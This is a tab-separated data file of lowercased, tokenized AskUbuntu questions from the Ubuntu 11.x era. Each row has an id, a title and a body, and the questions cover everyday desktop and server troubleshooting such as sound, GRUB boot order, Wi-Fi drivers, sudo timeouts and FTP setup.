106224	no sound after lubuntu installation .	my hardware is pretty new ; i 've installed lubuntu 11.10 and there 's no sound nor volume icon in tray . the sound works well in ubuntu . what can i do about it ? i have two sound cards in this laptop , and one of them is hdmi , maybe the problem is because of that ? please help me ? ! thanks .
106232	in an application or for the system , how do i bind more than one key to a shortcut ?	i have two keyboards . one is built-in to my laptop , the other is an external keyboard i use when docked . they have slightly different key mappings for things like multimedia keys . for that reason , i 'd like to make multiple assignments to a handful of keyboard shortcuts . my external keyboard does n't have a windows button , so i 'd like to launch unity dash ( for example ) using either a windows/logo button , or to a specific keybinding . is there any way to make multiple assignments this way in gnome ?
106236	changing the pop out feature of the icon bar	i have the ubuntu 11 and the icon bar pops out when i do n't want it . i comes out when i go to the back arrow in the same corner .
106239	how to grab a webpage with an open drop-down menu ?	i 'm trying to show a bug in a website that causes a drop-down box to be populated with too few options . i can show the source , but i 'd rather grab the screen with the menu `` open '' , i.e . with the available options showing . i tried two options , both fail : grab screen with keyboard shortcut ( shortcut does n't work when box is open ) grab screen with time delay , open the box during the delay ( the image grabbed shows the box closed ) is the second feature , actually a bug ? i was using gnome-screenshot , perhaps something else will work ? btw , there seems to be another bug with gnome-screenshot : when trying to grab and area with a delay , it ignores the delay and takes the shot immediately ... .is this a bug ... ( sorry , two questions in one )
106242	how to back to be the administrator in ubuntu 11.10	i was exploring in user accounts . i only have my account but i changed from administrator to standart . and i did n't can put to administrator again because it requets a password , i put my ancient but it does n't accept . i need a master password or something so . i ca n't install nor delete any application . also i cant loging root or superuser.what can i do to be like before .
106243	why does an additional top menu bar show off in gnome fallback mode ?	today i have updated nautilus and lightdm ( using the update manager ) , and after that , when i log into gnome classic , i always see an additional top bar menu , when the gnome 's top panel is hidden . this bar contains 6 menus : file , edit , view , go , bookmarks and help . how can i get rid of it ? did anyone of you have this kind of problem after an update ?
106246	unable to adjust screen brightness on gateway nv54	i have ubuntu 11.10 installed on gateway nv54 . i want to install drivers for video card because the screen brightness not changing.. but `` additional drivers '' not detecting anything . graphics : mobile intel速 gm45 express chipset thank you .
106250	how to delete an operating system ( windows ) from my computer ?	i want to install xp in my computer with ubuntu . i can have two , . but if i want to delette windows xp and stay with ubuntu . how can i delete windows and stay with ubuntu without changes in it ?
106255	how to back to be the administrator in ubuntu 11.10 ?	i was exploring in the users account . and i have changed my account rom administrator to standart . now it request a master password , and i ca n't install applications nor delete them . what can i do ?
106259	what apps to sync movie subtitles easily are available for ubuntu ?	i have a subtitle file that is about 3 to 4 seconds behind . what tools can i use to automatically move all the times in the subtitle file so they are correct with the time of the movie ? something that i can for example just add the time i want to add and it will add this time to the synced times in the subtitle files without having to edit each line individually .
106262	slow folder opening due to folder scan in xfce	is there a way to turn off background folder scan when opening a `` home '' icon on xfce desktop ? this takes time due to a lot of files in home folder ( source repos , why not ) .
106263	is there a media center application that uses the native gui ?	i 've tried a fair number of media center apps like boxee or xbmc . they all seem to use their own ui . is there one that uses the native ui , more like rhythmbox or banshee ? i 'm looking for something that has the library features of one of the more fully featured media centers i 've listed . e.g . features like getting actor and director names , and linking to other media in the collection that shares these attributes . e.g . if i have the birds in my collection i could click on alfred hitchcock and see rear window or whatever .
106267	are you meant to be able to search for files from the kickoff launcher in kde ?	as the question says , really - i get the impression that , when strigi has indexed files , you should be able to search for them from the launcher - similar to in windows 7 . however , it only ever shows results for programs when i try to search for something . am i just wrong about this ?
106268	easy backup solution from windows to ubuntu server 11.10	well for the last week i tried setting up amanda on my ubuntu server 11.10 . i should start out by saying that i 'm fairly new to ubuntu . well i googled and read guides and tutorials and no matter what i kept running into issues all over the place . i 'm way too frustrated and ready to quit . is there something that 's easy to setup that can backup my server , backup network shares ( windows server 2003 ) and also help me backup windows desktop clients . hopefully something that use ubuntu specifically on it 's installation guide . for now i setup scripts to backup the shares and stuff on the server , but i would really love to be able to get everything in a single place and be able to backup windows clients .
106272	right clicking a file , ca n't delete files/folders , no option to delete .	i have some files and folders that i ca n't delete . i click menu - > right click and the delete option is not available . i can delete by using the terminal , but i 'd prefer to do it from the gui . it 's something to do with permissions , can someone help ?
106273	what is ubuntu for android ?	the question is in the title , but can anyone provide some details on what it is , how it works , and when it will be available ?
106274	is there a way to apply a color profile system-wide ?	i 've calibrated two displays and like to apply those color profiles system-wide . this should also include the lightdm user , as the switch to my user 's color profile happens while logging into the session ( especially visually unpleasant if the greeter uses the same wallpaper as my user ) . is this possible ?
106277	howto add windows 7 in the grub on ubuntu 11.10	i searched all over the internet but there are no solution to my problem , whatever i add , grub menu does n't show up , i did a grub update but it does n't detect windows , i do n't know what to do , i have to log on windows 7 .
106284	hidden files showed in the dash	hidden files ( with ( . ) before the name ) are showed in the dash . is there any way to fix it ? the ubuntu version is 11.10 oneiric ocelot .
106286	run a command against an entire batch of files	i want to run a command line tool that takes a file , manipulates it and exports a new file . i can use this command just fine for a single file , but would like to make it run through an entire folder of files of a specified extension . i 'd like to name the newly created file based on the old file name , but change the first few letters of the file name to something i specify . like this : command newfile_same oldfile_same thanks for your help !
106289	need help with mount points during fresh install	i have decided to wait for windows 8 consumer preview ... but till then i decided to try various linux distro currently i dual boot with w7 n ubuntu my ubuntu is one big partition / and a swap partition i need a guide or something that tells me best way to reformat and use divv mount points like a diff /boot and diff /home ... . i need help with what file size and which mount points store what ... .
106290	internet very slow in ubuntu	i have ubuntu 11.04 as the os , both surfing the net and downloading stuff is a pain , it is really slow . i have turned ipv6 off , my connection is properly configured , but still it is very slow . i checked the net speed on a friend 's laptop , it is really fast , but on my pc it is mighty slow . i do n't know what to do ? help anyone . ps- it is a wired connection .
106294	ubuntu has any u+ ? like google has g+ ?	wow - http : //www.ubuntu.com/devices/android its nice to have finally ubuntu mobile/tablet operating system . which reminds me following : is there any u+ which represent ubuntu in social media too ? after all ubuntu is a symbol now like google . its time to build my badge in u+ too : )
106298	opening the audio menu ( systray ) in unity when playing in rhythmbox uses 100 % processor	if i just click on the speaker icon on the top right corner in unity , processor usage rockets to 100 % until i close the menu . i am playing some music on rhythm-box and have conky . is it doing something without a sleep ( ) or something ? does it have a do-nothing loop ? the funniest thing is that ubuntu-bug unity sent me to report a bug á¸§ere in askubuntu .
106306	how to recover lost partitions data ?	i have a 2tb sata drive that was being used as file storage on my ubuntu computer . i was re-imaging my windows box so i used that drive to back up some files to it . i did this by taking the drive from my windows pc and putting it in my ubuntu pc , mounted it and copied the files over . after the windows refresh i thought it would be easier to take the 2 tb drive and dock it in the external dock my windows case has built in . anyway it would recognize in bios but windows would not see it ( because it was ext3 or ext4 ) so when i went into the disk manager it advised me the drive needed to be initialized . me not thinking i initialized it as a guid partition table . now it sees it as a blank drive , even in ubuntu . i have done nothing else to write or change the drive . i was wondering if there is a qay to repair the old partitioning and get access to my files back ? many thanks ! edit : i followed the instructions in the link @ kniwor sent me . i used the command sudo gpart -w /dev/sda /dev/sda and here was the result : guessed primary partition table : primary partition ( 1 ) type : 007 ( 0x07 ) ( os/2 hpfs , ntfs , qnx or advanced unix ) size : 0mb # s ( 1 ) s ( 2861671176-2861671176 ) chs : ( 1023/254/63 ) - ( 1023/254/63 ) d ( 178130/202/1 ) - ( 178130/202/1 ) r primary partition ( 2 ) type : 007 ( 0x07 ) ( os/2 hpfs , ntfs , qnx or advanced unix ) size : 0mb # s ( 1 ) s ( 3484550160-3484550160 ) chs : ( 1023/254/63 ) - ( 1023/254/63 ) d ( 216903/55/1 ) - ( 216903/55/1 ) r primary partition ( 3 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 4 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r not sure it found what i wanted . suggestions ?
106307	slow flash on certain web pages	when trying to use www.songsterr.com for listening guitar tablatures i get a few second lag between diplay and audio . also , while playing on chesscube.com , moving the pieces is quite horrible because they are draging and responding really slowly - imagine playing blitz chess like that . i have two laptops , one is using linux mint other ubuntu . both computers have the same problem . no problem when using windows with vm . what can i do to make flash work properly ? thanks in advance .
106308	can i use ubuntu 11.10 for netboot ?	can i use an ubuntu 11.10 for netboot over pxe ? im aware of the ltsp and other similar proyects , but i dont find information using ubuntu 11.10 ( the latest )
106312	how do i build terminator ?	i do n't have admin privilege on this ubuntu machine , and i do n't see a way to build terminator . i found the tar.gz which contains setup.py but that is not what i want . can someone please guide me ? thank you .
106325	home folder button `` buggy '' after opening specific program ( maple 15 )	i 've recently done a fresh installation of ubuntu 11.10 64-bit ( not wubi ) . i had no problems , until i installed the program `` maple 15 '' . once i open maple , the home-button at the bar to the left , acts like the `` maple-15 '' -button . additionally , the usual `` maple 15 '' -button does n't appear in the same bar . while maple 15 is opened , i ca n't use the home-button to open the home folder . once i close maple 15 , i can use the home-button to open the home-folder . however , the home-button and the home-folder are n't `` connected '' anymore , so it just opens a new folder every time , instead of re-opening the already opened folder . if i uninstall maple 15 , the problem is solved . i did not have this problem on wubi . thank you , jesper
106329	how do i use ubuntu for android ?	i 'd like to know something more about ubuntu for android and its features and its date of release , if i can use it already and how . i 've read the official ubuntu page about it , but i 'd like to know how to use it , if you need a dock hdmi to use it , etc .
106331	terminating active application processes from/within application switcher in gnome-shell 3.2	in gnome shell when several applications are open in different workspaces i use applications switcher command + tab ( or alt + tab in a pc ) to active/switch to the app/workspace i want to use . is it possible to terminate an application within the application switcher , like in the mac environment with command + q ( or alt + q in a pc ) instead of using the window control icons or add this function somehow ?
106332	change sudo timeout under fish	i want to change sudo timeout , so i edit sudoers via visudo ( as adviced in many tutorials online ) to the following form : defaults env_reset , timestamp_timeout=20 root all= ( all : all ) all % admin all= ( all ) all % sudo all= ( all : all ) all defaults : my_username timestamp_timeout=10 the problem is , that nothing works and it seems i have sudo timeout=0 . this is my output from uname -a : linux comp 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux update what i 've noticed it 's only happens when i use fish ( aka user friendly shell ) . so problem probably with fish itself not with sudoers file . solution the problem was with my shell fish aka user friendly ( not very friendly this time , is n't it ? ) shell . for some reason it seemed that sudo command each time went from different sessions . adding defaults ! tty_tickets in sudoers file ( as described http : //us.generation-nt.com/answer/bug-598567-sudo-requires-reauthentication-each-use-ignoring-time-stamp-help-200510161.html ) solved the problem . see the link above for the addition information . thank you all for your attention without it i could not figure the thing out .
106335	how do i add hplip version 3.12.2 to my repository ?	i 've an hp officejet pro 8500a plus 910g all in one wireless printer . i 've downloaded from hplip version 3.12.2 which supports this model running under ubuntu 11.10 - 32bit version on one machine and the 64bit version on another ( both home-user dell laptops ) . the result is terrific - a vast improvement over the 3.11.7 version available from ubuntu software center . how can i get version 3.12.2 correctly installed into software center ( or synaptic package manager ) ? what is the ppa for hplip ( or where can i search for it ) so that updates can be received automatically without me having to `` re-invent the wheel '' when a new os distribution is released ? thanks .
106343	sound not even on playback	why is the sound volume not consistent . some videos on youtube play loud some too quiet . same thing with pithos .
106346	backup logs before installing updates	so i ran into some issues booting my machine recently . apparently after an update is when the chaos started . i was told to backup log files but i am unsure how to back them up . is there anyway to automate that process ?
106348	is there an easy way to reorganize tags in shotwell ?	i have a little over 800 photos with tags in shotwell . recently , hierarchical tags have been added . now i want to reorganize my tags , e.g . i want a `` people '' tag and subtags of `` mom '' , `` dad '' , etc . is there an easy way to do that , which does n't involve me draging and dropping all the tags to their parent tags ? i have quite a lot tags and since every time i drag and drop a tag , i can only select one tag i want to move and i have to wait for shotwell finishing that operation . after it 's done that , the list view scrolls back to the top , which means i have to scroll back down all the way to `` people '' . example for clarification , pretend tags were directories . i want to do mv tags/ { mom , dad , brother } tags/people/
106351	running programs in the background from terminal	how do i run a program in the background of a shell , with the ability to close the shell while leaving the program running ? lets say my ui is having problems or for some reason , i need to boot up a program from the terminal window , say , nm-applet : nm-applet when it 's started , it occupies the foreground of the terminal window . is there any simple way to run the program in the background without needing to leave the terminal open or have it occupy the whole terminal ? on that note , i did find a way to run programs from the terminal and have it allow for other inputs , by appending an ampersand ( & ) to the command as such : nm-applet & but this is n't much use as any processes started in the terminal are killed once the terminal is closed.
106355	permissions changed on upgrade to 11.10 , now `` read-only ''	i recently upgraded from 11.04 to 11.10 . i have several external hard drives , and now i can not change anything on them : the permissions have seemingly been altered to read-only . when i look at the `` properties '' of each drive in nautilus , it shows me as the owner , yet i can only `` access files '' . when i try to change this to create and delete files , it shows an error message `` sorry , could not change the permissions of `` 124e43f04e43cae5 '' : error setting permissions : read-only file system '' . i have tried to alter file permissions by starting nautilus with `` gksudo nautilus '' , but it does n't work . i have tried to change permissions for the whole drive using the chmod command in terminal . still no success . i am not a noob , but i am at a loss as to what to do next . can anyone help ? my back-up destination is one of the external drives , and i can not back-up until this is fixed . thanks in advance .
106364	default ruby version set with rvm not recognized by system	i 'm trying to get the system to use the ruby version i 've set with rvm . the following commands produce this output : $ rvm use 1.9.2 -- default using /usr/share/ruby-rvm/gems/ruby-1.9.2-p180 $ rvm current ruby-1.9.2-p180 $ ruby -- version ruby 1.8.7 ( 2011-06-30 patchlevel 352 ) [ x86_64-linux ] here 's the contents of my path : path=/usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games also : $ whereis ruby ruby : /usr/bin/ruby /usr/bin/ruby1.8 /usr/lib/ruby /usr/share/man/man1/ruby.1.gz $ whereis rvm rvm : /usr/bin/rvm /usr/share/man/man1/rvm.1.gz i assume this is an issue of environmental variables , but i do n't really know what to do beyond that . i 've tried rvm system , then rvm list and rvm current only list 1.9.2 with ruby -- version listing 1.8.7 still i 've also tried adding export /usr/share/ruby-rvm/gems/ruby-1.9.2-p180 : $ path to .bashrc , then restarting and still .
106366	windows xp dual boot removal	i 've had ubuntu dual booted with windows xp for awhile now and i think it 's time to get rid of windows . how do i do this correctly so i do n't mess up my hard drive ?
106367	i 'm having recurring problems with a driver install and think that there may be some corrupted/truncated files . how do i clear them ?	i 'm running ubuntu 11.10 x86 with pae on gnome3 . i have a radeon hd 5750 , phenom ii 955 , and 6gb of cheap ddr3 . i want to install the newest version of the proprietary amd driver for the gpu , however amd 's site is giving me some nonsense about a duplicate header and wo n't download the file . when using ubuntu 's built-in installer , there are two options : one with post-release updates and one without . the one without installs fine , but renders gnome-shell unreadable ( applications work fine , interestingly ) . the version with updates , however , cuts off quickly and tells me to view /var/log/jockey.log . i have tried it more than a few times , and have rebooted multiple times . is there a way to clear any caches ? the program itself crashed the first time through , and i suspect that there might be some screwy files acting up . here is jockey.log , in case that helps . thanks in advance .
106369	how to make phone calls from one pc to another	i have 2 ubuntu pcs ( not in the same physical place ) and i want to call from my pc to the other . what apps does ubuntu have for making phone calls from pc-to-pc . updated - forgot to mention that it should not be skype or google talk . in the case of skype because we are actually looking for an alternative to it to call one another . for the google talk plugin because the need to have a web browser opened to use it is not what we need .
106372	ubuntu one is not working ?	in large red text : `` the information could not be retrieved . maybe your internet connection is down ? '' on the ubuntu one control panel . i am currently connected . below is what i 've got from u1sdtool -- status : state : local_rescan connection : with user with network description : doing local rescan is_connected : false is_error : false is_online : false queues : working any help would be appreciated .
106374	touchpad scroll not working on hp pavilion dm3 laptop	i have an hp pavilion dm3 laptop running ubuntu 11.10 . my touchpad works perfectly fine , but with one exception , the scrolling does not work . does anybody out there know of any sure-fire fix that exists out there ?
106375	using the terminal in ubuntu to change directory	i have a question about using the terminal in ubuntu 11.04.i have installed wine and steam and civ iii thru steam.according to instructions on wine forum in order to play civ some font files need to be moved within the wine folder which i have done but it also informs to do the following : then open a console and browse to : .wine/dosdevices/c : /program files/steam/steamapps/common/sid meier 's civilization iii complete/conquests/ and type the following command : sudo chown root lsans . * when i open the terminal i am able to change directory to .wine/dosdevices/c but when i try to change to the next `` program files '' i get message in terminal not found . i type in ls command and does list `` program files '' why am i not able to change to directory `` program files '' below is actual steps in terminal i have done mike @ ubuntu : ~ $ cd .wine mike @ ubuntu : ~/.wine $ cd dosdevices mike @ ubuntu : ~/.wine/dosdevices $ cd c : mike @ ubuntu : ~/.wine/dosdevices/c : $ ls program files users windows mike @ ubuntu : ~/.wine/dosdevices/c : $ cd program files bash : cd : program : no such file or directory mike @ ubuntu : ~/.wine/dosdevices/c : $ i also tried capitalize
106377	is dhclient.conf used during boot when bringing up network interfaces ?	i am running ubuntu 11.10 32bit server on a single-board computer . i want the option of using the ethernet interface ( eth0 ) as a backend to control the computer if it 's connected . i 'm also lazy : if the cable is plugged in and i power the computer , i want eth0 up and running ; in the event no cable is plugged in to eth0 upon powerup , i would like to be able to significantly reduce time it takes to bring eth0 `up ' during boot . i had thought that simply changing the dhcp timeout value to something small would do the job , but even after editing the /etc/dhcp/dhclient.conf , i still get the same long boot times when the cable is unplugged . i understand the value of a robust bootup sequence for servers ( see top answer for [ 1 ] ) , but i do n't understand why changes to dhclient.conf are ignored during boot . is there anything else going on under the hood that i 'm not aware of ? perhaps i 'm approaching the problem the wrong way ( in which case i might need to ask a different question ! ) ? thanks in advance for any input . my /etc/network/interfaces file contains : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto wlan0 iface wlan0 inet static ... my /etc/dhcp/dhclient.conf file has uncommented and changed the line : timeout 5 ; [ 1 ] `` waiting for network configuration '' adding 3 to 5 minutes to boot time
106384	wifi stopped working on acer aspire 3680 using 11.10	a while ago the wifi on my acer aspire 3680 just stopped working . the switch is on and it can see my network , but it will not connect . it has an atheros ar2413 802.11bg nic . rfkill shows there are no soft blocks in place . sudo rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no here is what iwconfig said : iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off
106389	wireless firmware is missing	i just installed ubuntu 10.10 on my hp pavilion dv5000 . it does n't seen to recognise the wireless network and it says wireless networks device not ready ( firmware missing ) . is there some kind of update that i can download ? i would really like to get this problem fixed . output from sudo lshw -class network : ~ $ sudo lshw -class network *-network:0 description : network controller product : bcm4318 [ airforce one 54g ] 802.11g wireless lan controller vendor : broadcom corporation physical id : 2 bus info : pci @ 0000:06:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : bus_master configuration : driver=b43-pci-bridge latency=64 resources : irq:21 memory : c0200000-c0201fff *-network:1 description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 6 bus info : pci @ 0000:06:06.0 logical name : eth0 version : 10 serial : 00:16 : d4:04:8c : cf size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=full ip=192.168.1.108 latency=128 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:22 ioport : a000 ( size=256 ) memory : c0202000-c02020ff *-network disabled description : wireless interface physical id : 3 logical name : wlan0
106391	what 's the use for all of shutdown 's options ?	some are fairly obvious . specifically , i am referring to : -h halt or power off after shutdown -h halt after shutdown ( implies -h ) -p power off after shutdown ( implies -h ) is n't halting or powering off kind of expected when you 're shutting down ? are n't these redundant ? -c cancel a running shutdown how on earth would you use this ? in my experience , once a shutdown has begun , you do n't get much opportunity to enter more commands until the machine is off . -k only send warnings , do n't shutdown why does shutdown have an option that makes it not shut down ? what 's the deal here ? does `` shutdown '' mean more than simply turning the machine off ?
106396	how do i change the the boot default from ubuntu to windows ?	9 days ago i added kubuntu 11.10 ( oneiric ocelot ) to windows 7 on my computer . since then i have spent 12 hours plus trying to change the default grub selection from ubuntu to windows . i have gotten several different kind of advice , but none of them work . i have changed to grub_default=5 and tried grub-default `` windows ... ... '' but no matter what , when i restart , ubuntu is again the one that starts as default . when i open the text editor it clearly now states `` windows ... .. '' as default , and it also showed 5 , when 5 was set as default , only when i start up the computer ... . it is always ubuntu , unless i stand at the computer and when the page with the boot options comes ( gnu grub version 1.99 - 12ubuntu5 ) i click down to the sixth and last entry , my windows ... . how to make this work ?
106399	what might be causing momentary system freezes ?	i just built a new pc with pretty solid specs , at least , more robust than most i 've built in the past . it 's got a six-core amd processor , 600watt power supply , 8gb ram , etc . i loaded up a fresh copy of the latest ubuntu 11.10 and prepared to be blown away . however , while it runs fine , i 'm seeing frequent lag , where the mouse stops dragging momentarily , tabs freeze in the browser under both firefox and chromium ( with only 4-5 tabs too , not a huge number of tabs ) , etc . the system monitor looks great , everything is almost at the baseline -- it 's not like i 'm loading the cpu or using tons of ram . is there any common thing i 'm overlooking that would affect this ? specs , for those who want to know : motherboard : gigabyte ga970a-ud3 processor : ( fx-6100 ) ram : corsair 2x4gb ddriii graphics : nvidia n550gtx-ti ( 1gb ram )
106402	how to change the desktop wallpaper that 's part of a slideshow ?	i am currently running ubuntu 11.10 running gnome 3/ gnome shell . i love the new ubuntu desktop backgrounds , especially the one that changes periodically . however , that angular cat graphic drives me nuts . i 've deleted it on other systems and it breaks the slideshow . is there a safe way to edit that rotation so i can get rid of the cat without disabling the slides ?
106403	app that shows access point wireless security ( extended information for ap )	in 11.10 , the default networkmanager only shows the wireless access points but it does not provide a way to know if they are wep , wpa , wpa2 ... as you can see from the image all i can extract from each ap is the quality and if they have a type of security or not . what graphical tool can i use to see all aps and what type of security they are using as well as any other common information provided by an ap like quality , signal level , etc ... something similar to the terminal command `` iwlist '' but instead of terminal , a gui app .
106410	linux command that builds a shell script automatically after you run a command	alright i 'm drawing a blank here but i know i used to run some linux command that would automatically generate a shell script for me based on how i interacted with the shell . example : if i remember right i would prefix my command id like to run with the command i 'm trying to remember and it would automatically build my shell script based on the filename i gave it to output . like this ... < command > telnet `` whoever '' > file.sh i dont know if that 's how i use to run it but i think it was close . the command logged the telnet session and based on my input of username and password it generated a script automatically based on that criteria i typed . this was just one example that i used it for . it was a good command to save time in writing a script to automate certain things that required user intervention . anybody know what im talking about ? im pretty sure its a standard linux command but last time i used it was probably ten or twelve years ago before ubuntu , when red hat was still just red hat
106413	why is the ubuntu live user signed into all tty 's ?	ubuntu , out of the box , has the live user signed into all tty 's . what is the purpose of this ? why ca n't i sign the user out of these tty 's ? in a freshly installed ubuntu environment , my user is not signed into all the tty 's . why ? if i do sign into a tty in the installed environment , i can sign out . how is this possible compared to the live situation ? is it possible to disable tty 's ? if so , how ?
106426	is there any cam splitter for ubuntu ?	i 've been searching for a long time now online and decided to ask . is there any webcam splitter for ubuntu ? a prog that lets you use your webcam on more than one application at the same time ... i ca n't find any .
106428	how to disable automatic login ?	i was playing around with `` user accounts '' and somehow set automatic login . now , when i start my pc , it just has one button named as `` login '' . clicking that button , directly logs me in to my pc . there is no music or no asking for password while logging in . as a side effect , it asks me separately for keyring password how to disable auto login and make login/keyring password unified again like before ? note : attempting to disable automatic login from system settings > user accounts does not work . this is the content of my /etc/lightdm/lightdm.conf ( where i have commented the autologin for my username mgandhi ) : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu # autologin-user=mgandhi
106435	simple ssh examples for ubuntu	i would like to use ssh to access the shell of another ubuntu computer and issue a few commands . i 'm interested in how to form the shh command in the following scenarios . to keep it simple , i will not be using password protected accounts . i would like to focus primarily on command formations that establish the connection . two local ubuntu computers directly connected with an ethernet cable : two remote ubuntu computers where each is connected via cable modem ( each has it 's own ip ) : same as previous , but one is using nat : two remote ubuntu computers , where one is connected via a cable modem and the other is connected via a wireless router : two local boxes connected to the same wireless router :
106437	how to install package that was downloaded as source files	please suggest me as step-by-step process . i thinkthat first of all , i have to decompress and compile them but i do n't know how to do .
106441	total beginner wants remote desktop access to lamp server	i have purchased a cloud server with ubuntu lamp setup installed . i am trying to get started with this , for me , new thing . i am only used to windows . i have tried to get some kind of visual access to my new server but failed . googling led me to run this command 'apt-get install vino ' . a lot happened and i guess it was installed . then i typed vino-preferences and it said 'gtk-warning ** : can not open display : ' then i tried 'vino-server ' and it said 'vino-server : command not found' i can see in /usr/lib/vino that therer is a green entry called vino-server . please help me .
106446	can i connect totem/mplayer with my multimedia library as the default player ?	i am a huge fan of totem and mplayer and prefer their sound to other applications . i want to setup my multimedia library in such a way that when i play any multimedia file it should be played in totem/mplayer . ps : i use ubuntu 11.10 . pps : i would really appreciate if i could get most of the functionalities of softwares such as banshee and rhythmbox if not all .
106460	compiz/unity not working	sorry for my bad english but i 'm french . well , i have this new ubuntu with unity and compiz just does n't work . as you can see i have everything i need checked : http : //i.stack.imgur.com/aykyc.png and : http : //i.stack.imgur.com/uienv.png but after this when i close , minimize or anything , nothing happends . i do n't know what to do , i already have the driver for my graphic card . thanks ; )
106465	how can i find out if nautilus uses copy/move validation ?	normally i use rsync or rdiff-backup to copy or move large amounts of files around with validation activated . i do n't know if nautilus uses some kind of verification on copy or move commands .
106467	tortoisegit for ubuntu	are there any alternatives to toroisegit for ubuntu ? i 'm looking for something to integrate git with nautilus in the context menu . like tortoisehg used to ( replaced with hg scripts )
106470	gimp wo n't open any more	my gimp is not opening any more , after trying to upgrade to 2.7 ( i added the ppa to do that ) . i got an error when trying to upgrade that said some dependencies could n't be solved . so i removed the ppa , removed gimp altogether , and reinstalled the standard gimp ... installation went ok but now it wo n't open . how can i troubleshoot it ? invoking gimp in a terminal gives : gimp : error while loading shared libraries : libbabl-0.0.so.0 : can not open shared object file : no such file or directory
106474	there is no `` install ubuntu side by side '' option	i wanted to install ubuntu on my notebook parallel to windows vista . but instead of three options , i could only choose between `` replace windows vista '' or `` change partition '' .
106476	how to compile amule 2.3.1 ?	i was following howto compile in ubuntu but run into error message like this : make [ 1 ] : entering directory `/home/krasinski/applications/amule/wx/build/wxgtk-2.8.12/utils/wxrc' make [ 1 ] : *** no rule to make target `all ' . stop . make [ 1 ] : leaving directory `/home/krasinski/applications/amule/wx/build/wxgtk-2.8.12/utils/wxrc' make : *** [ wxrc ] error 2 `
106480	accessing encrypted home folder / return to login screen	i been having problems with ubuntu , in that i can reach the login screen , but when i enter my password it comes up with a black screen with some text and takes me back to the login screen - i can login in terminal mode . after trying several fixes posted on the internet i decided to just reinstall ubuntu , since i do n't have anything important on . however i did want to backup my home folder . this folder was encrypted on installation . when i try to access it from the livecd version of ubuntu , it displays a readme.txt file that tells me to run ecryptfs-mount-private . i run this and it displays the error 'encrypted private directory is not setup properly ' . any solutions to both of these problems would be appreciated .
106481	uninstalling ubuntu from dual boot / change bootloader	i have a win/ubuntu 11.10 dual-boot setup , where i am running the oses on separate partitions of my laptop hdd . i assume the best method of uninstalling is 'simply ' a matter of deleting the ubuntu partitions -once i 've made sure control is given to the windows bootloader instead of grub after post . the question is : how do i do that ? stuff i 've tried : i tried the boot-repair cd ( https : //help.ubuntu.com/community/boot-repair ) , but that was a bit beyond my abilities to figure out if i could do it with that tool : / . i also tried easybcd ( http : //askubuntu.com/questions/66070/how-to-set-windows-bootloader-as-default-bootloader ) . it could n't identify my ext3 partitions , let alone change the bootloader . lastly , i tried installing startup-manager in ubuntu , and using that to set the win7 bootloader as default . but upon restart , it still loads grub . kind regards , martin
106485	losing bandwidth	i have installed ubuntu linux 11.10 . my bandwidth is being used up . using nethogs eth0 shows that /usr/bin/python is sending and receiving all the time . using netstat -tup showed that the address 48293.kwaimuk.canonical : https is using up my bandwidth . how can i stop this ?
106486	ipython3 command not found	after configuring and installing ipython to run under python3 , as explained by this wiki , and having completed all the steps , i still get : gmask @ gbuntu : ~ $ ipython3 qtconsole no command 'ipython3 ' found , did you mean : command 'ipythonx ' from package 'ipython ' ( universe ) command 'ipython ' from package 'ipython ' ( universe ) command 'python3 ' from package 'python3-minimal ' ( main ) ipython3 : command not found no idea what i am doing wrong ...
106489	where is the per-user salt kept ?	where does ubuntu keep the password salt for each user ?
106493	what do i install to get java to work on ubuntu 11.10 running on virtualbox ?	i have tried many things and nothing works . what files do i need to download for this to work ? there is no internet connection in ubuntu , so i want to download 1 or 2 files and install from desktop . i had a few different java files that i tried , and terminal says that it needs java-common and some other things . why can '' t it just be easy ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? simple instructions for a simple man please ! thank you for your help ! !
106499	flash player crashes with firefox/ chrome/ chromium	i searched , but i found only old problems . the solutions of them did not helped me at all . i tried to install manualy flash from adobe , also adobe-flashplugin and flashplugin-installer etc in repos , but with no luck . fp crash in video sites like youtube and vbox7 ( dot ) com ( it 's bulgarian alternative of youtube ) , but no crashing in flash pics and some games like 5strike ( dot ) com . here is a code when i run chrome/firefox/chromium in terminal and try to run flash video . didko @ acer : ~ $ firefox warning : pipe error ( 68 ) : едностранно прекъсване на връзката от отсрещната страна : file /build/buildd/firefox-10.0.2+build1/build-tree/mozilla/ipc/chromium/src/chrome/common/ipc_channel_posix.cc , line 419 didko @ acer : ~ $ chromium-browser [ 20165:20175:21125651132 : error : web_data_service.cc ( 625 ) ] can not initialize the web database : 2 ( exe:20306 ) : gdk-warning ** : xid collision , trouble ahead ( exe:20306 ) : gdk-warning ** : xid collision , trouble ahead edit : i 'm using ubuntu 11.10 with gnome-shell
106500	how to configure vsftpd ?	i 've been at this for hours . i basically want to be able to upload / manage a website on my new ubuntu server , using filezilla from my windows 7 machine . i have installed vsftpd on the server , but i am stuck on the configuration part . i have read 10 different recipies online , but none seem to get me where i want to go . i basically want a username/password combination that i can use to access the www folder in apache and upload files . can you help me create this user and write the correct vsftpd configuration so that it 's safe and only i can upload php/html/css etc directly into the apache . also create folders etc ... everything i am used to from a windows server . thanks in advance
